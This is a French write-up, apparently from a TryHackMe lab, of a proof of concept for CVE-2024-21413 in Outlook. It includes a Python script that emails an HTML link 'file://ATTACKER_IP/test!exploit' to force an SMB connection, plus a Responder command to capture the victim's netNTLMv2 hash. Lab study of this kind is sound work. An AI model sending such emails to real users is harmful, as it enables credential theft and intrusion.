
Preuve de concept pour CVE-2024-21413 utilisant Moniker Link dans un email HTML pour déclencher une connexion SMB et capturer les hashes netNTLMv2 via Responder. Démontre des compétences en test d'intrusion, scripting Python et analyse de protocoles réseau.
Aperçu : Une preuve de concept (PoC) pratique démontrant l'utilisation d'un Moniker Link dans un email HTML pour déclencher une connexion SMB depuis Outlook, permettant la capture du hash netNTLMv2 d'une victime via Responder. Cela met en avant des compétences pratiques en test d'intrusion, en scripting et en analyse de protocoles réseau.
file://) pointant vers le partage SMB de l'attaquant.# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124' # THM SMTP server
password = input('Enter attacker email password: ')
html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'
msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))
with smtplib.SMTP(mailserver, 25) as s:
s.ehlo()
s.login(sender, password)
s.sendmail(sender, [receiver], msg.as_string())
print('Email delivered')
Astuce : Remplacez ATTACKER_IP et mailserver avant d'exécuter. Dans le lab TryHackMe, le mot de passe est attacker.
responder -I ens5
Remplacez ens5 par le nom de votre interface réseau.
/etc/resolv.confParfois, Responder échoue à cause de liens symboliques cassés dans /etc/resolv.conf. Correction avec :
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
Compétences mises en avant : Résolution de problèmes Linux, configuration DNS et adaptation d'outils aux environnements cloud/VM.
Erreur / Problème resolv.conf :`

Correction DNS appliquée :

Script Python d'email :

Livraison de l'exploit :

Boîte de réception de la victime :

Hash capturé de la victime :

Adapté du lab MonikerLink de TryHackMe et du PoC original par CMNatic (GitHub)